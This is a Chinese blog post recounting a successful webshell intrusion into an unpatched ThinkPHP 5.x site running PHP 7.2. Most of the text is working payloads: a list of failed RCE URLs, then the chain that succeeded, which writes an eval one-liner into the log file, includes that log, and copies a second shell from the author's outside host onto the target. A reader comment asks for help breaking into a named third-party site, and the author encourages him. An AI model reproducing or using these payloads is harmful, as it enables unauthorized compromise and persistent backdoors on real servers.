起因
thinkPHP 的命令执行漏洞已经过去好一阵子了,然而还有许多站并没有修复这个漏洞,今天恰巧让我遇到这么一个,
但是因为目标 PHP 版本是 7.2.14 导致 GETSHELL 变的异常麻烦,在各种折腾下最终成功,记录分享一波~
GETSHELL 过程
?s=index/\think\Request/input&filter=phpinfo&data=1
?s=index/think\config/get&name=database.hostname
?s=index/think\config/get&name=database.password
?s=index/\think\Request/input&filter=system&data=id
?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
?s=index/\think\view\driver\Php/display&content=<?php%20phpinfo();?>
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
以上这些方法全部行不通,不过在用下面这个方法却能成功显示 phpinfo
_method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo
说明有戏,可以试试,禁用了很多函数,经过各种查阅文档和尝试,最终通过下面的方法 GETSHELL
1.写入 shell 到日志文件中
_method=__construct&method=get&filter[]=call_user_func&server[]=-1&get[]=<?php eval($_POST[1337]); ?>
2.包含日志文件 GETSHELL
_method=__construct&method=get&filter[]=think\__include_file&server[]=-1&get[]=./runtime/log/201905/04.log
其实这一步就已经可以结束了,但是由于一句话和日志混在一起的,日志又基本很大,导致很麻烦,所以我们还需要在来一个步骤
3.通过一句话 copy 新一句话文件
_method=__construct&method=get&filter[]=think\__include_file&server[]=-1&get[]=./runtime/log/201905/04.log&1337=echo copy("https://www.mrwu.red/1.txt","/www/wwwroot/test.xxxx.cn/2.php");
这样的话,这个 2.PHP 文件中的内容就是我们 1.txt 中的内容,没有其他乱七八糟的东西,舒爽多了
参考
本文作者为Mr.Wu,转载请注明,尊守博主劳动成果!
由于经常折腾代码,可能会导致个别文章内容显示错位或者别的 BUG 影响阅读; 如发现请在该文章下留言告知于我,thank you !
这个宝塔怎么过,黄站,求日 http://2c3nwpw.cn thinkphp5.0.20 ,禁用invokefunction
@ddd宝塔限制不严谨,多花点时间,可以搞定的,你在折腾折腾吧
楼主我想问一下往日志文件里面写的shell那个server参数是干什么用的,是用来报错的还是必须的参数啊?
[…] thinkPHP 5X 在PHP7以上环境下的 GETSHELL 2个月前 (05-04) 0 […]